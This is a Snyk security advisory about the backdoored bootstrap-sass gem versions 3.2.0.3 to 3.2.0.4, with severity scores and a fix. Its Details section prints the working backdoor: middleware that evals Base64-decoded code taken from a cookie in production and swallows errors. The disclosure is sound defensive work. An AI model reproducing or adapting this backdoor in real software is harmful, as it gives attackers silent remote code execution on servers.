Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 81.21% (99th percentile)
Expand this section
NVD
9.8 critical
Expand this section
Red Hat
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-RUBY-BOOTSTRAPSASS-174093
  • published 3 Apr 2019
  • disclosed 26 Mar 2019
  • credit Derek Barnes

How to fix?

Avoid using the malicious versions of bootstrap-sass.

Overview

bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.

Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor which will enable a remote attacker to run arbitrary code on the server by decoding a specific cookie value and evaluating its content.

Details

When bootstrap-sass gets imported, it also imports the following malicious middleware code that resides on lib/active-controller/middleware.rb:

begin
 require 'rack/sendfile'
 if Rails.env.production?
   Rack::Sendfile.tap do |r|
     r.send :alias_method, :c, :call
     r.send(:define_method, :call) do |e|
       begin
         x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
         eval(x) if x
       rescue Exception
       end
       c(e)
     end
   end
 end
rescue Exception
 nil
end